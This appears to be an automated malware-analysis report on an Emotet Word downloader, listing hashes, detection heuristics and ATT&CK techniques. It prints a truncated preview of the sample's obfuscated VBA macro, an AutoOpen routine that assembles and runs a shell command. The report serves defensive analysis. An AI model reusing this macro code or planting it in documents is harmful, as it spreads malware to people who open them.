Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 c2064bf8c84ee9b8…

MALICIOUS

Office (OLE)

Size: 117.8 KB
Created: 2018-09-26 15:00:00
Authoring application: Microsoft Office Word
First seen: 2018-10-19
MD5: 3f1677ec9208e04769ec7ff29610de69
SHA-1: 641edf8ca2abbf97d7d4a9a9b9e5d9c45f2ec65e
SHA-256: c2064bf8c84ee9b8d826b4bc4289f3420f87db255d2add113be47e28922a8c66
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains a critical OLE_VBA_SHELL heuristic indicating a Shell() call within its VBA macros, and ClamAV identifies it as Doc.Downloader.Emotet-6826497-0. The AutoOpen macro is present, suggesting it executes automatically upon opening. The primary function appears to be downloading and executing a second-stage payload, consistent with Emotet's behavior.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6826497-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826497-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 81760 bytes
SHA-256: 408d1755faed3e74845d01f2a2280f29d72085670154d51e2ae8f470beba31d2

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "isAZnTMVqjUrL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim DzncOb(2)
DzncOb(0) = MidB(BGWcsR + CwhErJlBlURMIEEPjjrQ + MtOiCqu, 190, 18) + Left(HwmFpCb + AIsUnnBXYLiiEvGwv + MXHbF, 354)
DzncOb(1) = Left(iPnGkEAu + CsmcawnHBuvdhhVMLSVsdt + OjZDAOUs, 627) + Mid(wLoaKIw + GYqIihfhAIiivhzuhI + YLYBX, 851, 201) + Left(KIopsQY + IKfMCSJicKECdSzFjIT + dXVMiD, 325) + MidB(zAiVLJG + NhYaIXSZTSmaOjiwzjbL + EdmBHnz, 772, 15)
   Dim EAQdRb(1)
EAQdRb(0) = MidB(ERmwru + DKitlHPiwslGOcJnwJOTVH + sBHQRnp, 722, 224) + Left(szkmQUj + ppPGiniorNZXcFjazQ + SNRpMX, 970)
   Dim zXbwjr(1)
zXbwjr(0) = Left(IHaPcAwm + XtzNvZzzIEpbjCDQkd + oPZHq, 237) + MidB(OHunjq + CwjkHjTuAZztVkmIwWRJkv + hhsjMQbO, 775, 882)
   Dim FvtMqm(1)
FvtMqm(0) = Mid(tXivtio + mwoUtmwQMhRGznDCcF + iLzJzzpi, 535, 430) + MidB(vFiLJ + ZZjKmQvFimcfGJwcz + iFvcuWu, 176, 843) + MidB(ttYBBKh + kzptzuwVPhvHbOJhtBwm + lacEHlvP, 49, 823) + Right(BdMcvn + mmvhaBzpznMvHRtNdm + HHLNf, 403)
   Dim mcrCmB(2)
mcrCmB(0) = MidB(AHzUs + XMJKoIXtYztRRptazW + qEwPwJ, 616, 941) + MidB(XSzOnK + jiipHQavHaRtXpGptajj + ZtzbwC, 672, 950)
mcrCmB(1) = Left(DqAwiWW + WIaAcHhUkozwDSuzzErT + mBSKGWD, 427) + MidB(OwtWT + ONunFmNMbXOUiQqFdWN + dqwDjcY, 608, 968) + MidB(GPwjOjw + jHnbZidfXwAzJKiijDrPkA + TJqta, 369, 349) + Right(DXdBzs + ldGFmSaRLrpsrjKVXdX + FpLRAcj, 211)
jCsahquHk (KeyString(DOqoPdzG + KqGcfJ + 20 + 15 + 32 + mVnwEBl + jTwakz) + QGIQzOf + TwviIpt + KeyString(UEEJpD + Qnrza + 23 + 17 + 37 + wODmKoG + XioWn) + fdkIw + IbZwWdaEsLJ + VABcR + dSIbdF + RwXzbjAYTdW + IGwFlKbaqw + kmrCBU + KiIwf + VjvaCCW)
   Dim PFKBa(1)
PFKBa(0) = MidB(GhnZOZ + ZtfCMrOWPstqFBrLPPGEh + BRrWP, 910, 269) + Right(JXTHK + omiFiAfnXOGPTpDpzkzAwf + sjRkA, 280) + Left(SzGbAl + rjHBhUZDUDsollwnCWn + dBWwlcoM, 557) + Mid(QYYXY + jfLtcjNhEwFMESjzbqbj + XdVAjY, 275, 911)
   Dim itUJUW(2)
itUJUW(0) = MidB(aXNjVS + ZkZGhcIPBcvwvMsHtIL + ziTZjTC, 329, 152) + MidB(iSkRLR + TuDRiaRTKnBORvHCZvzLnqT + bbwcwRA, 684, 911) + MidB(zRzZGUI + WcOLOzTjQaOHAOLEwRLM + CHwZES, 662, 198) + MidB(zMkNK + AfmVsdHsJDMvKwLfBui + EAjsndzu, 566, 711)
itUJUW(1) = Left(DtJdoAM + zLwjnnBSmWhtQslOLJjK + VDCBMtR, 781) + MidB(pkJAp + LwpzJcjZPwzVzzRkz + sEsfJ, 47, 254) + Mid(YPtYLKj + kVmiTrsomJiFwmFHiSPTUi + bqpnQFK, 292, 154) + MidB(lBmQNa + TSHSEbhHUCSJRDzzscv + mswFrCB, 860, 473)
   Dim PTXkN(2)
PTXkN(0) = MidB(CuFANs + NOaCaXdfMaVqFtZmuz + lEEtnY, 732, 595) + MidB(VonSVA + qsYnShwwGoGwXhwWizEthU + RfrXYD, 318, 133)
PTXkN(1) = Right(wlXwLcfq + zGndWijmwqSfvFiP + RuIpNwi, 735) + Left(qUqXKr + uzkUojZLRPWwbjMinJfW + kzwVn, 404)
   Dim jjjYq(1)
jjjYq(0) = MidB(JkOXE + IAqbfwFziFDrjjKfwjjoH + mRvcrSZX, 860, 667) + Left(PiBjMFT + YaEiNZFOMjUpLnmmdUnAzz + wzXjoTzO, 838)
End Sub


Attribute VB_Name = "hUEwwFIJnmQWF"
Function fdkIw()
awcJzutpjwn = "d / // /\\ \\/" + "\ /V/C" + """" + "set *+=2a" + "70 720a 2a70 720a " + "a207 207a 20a7 0" + "a27 7a02 2a70" + " 02a7 02a7 "
bKfWnNTdbzj = "072a 072a a7" + "02 70a2 270a 720a}7" + "20a}02a7{0a27"
Dim KYCRhJ(1)
KYCRhJ(0) = MidB(uAofSli + rDdRIHHRUAlOpwbLaqbWk + tJfJF, 101, 801) + MidB(zRVCRaJP + vfLljVWSZPhGOTcIOv + uGhbY, 894, 7) + Left(hRqWi + nuiXffPZwDGjHaYziwulcS + zbqjf, 903) + Left(TMYdOq + brtAEHszQtAsJGFPzzMXLD + LasCo, 816)
   Dim moMZj(2)
moMZj(0) = MidB(GaXFO + rowmmEsjYDGonOHz + ElANFTAH, 545, 761) + MidB(oFzsU + nzclijDSmIwQnDvZjs + GkwaaBo, 916, 889) + Left(YwczWmZ + UTopiaSwuuSkMVAFCdqOTiD + DZmHc, 402) + MidB(vHrziszz + omGzonMEiEVLHtWIm + whEaHF, 378, 720)
moMZj(1) = Right(iKOcEE + nPQliavMbzcqwiZpOfNtTmpn + jColJw, 501) + MidB(wiivR + OYkjpmiWUaWwnvvEZKrh + afaPj, 685, 920) + Right(YQDUawY + oYDCLFjANScWqkHDumki + acjaUI, 18) + Mid(saAYTVY + iiEBaSsoUkbEmkcHJfE + uzKbroiV, 739, 20)
jKwdnEswG = "h072ac0a72t2a07a72a" + "0c20a7}70a2;a2" + "70k702aa270ae0a7" + "2r07a2b7a02;a270V" + "02a7z207aE" + "2a07$2a07 0a27m7"

... (truncated)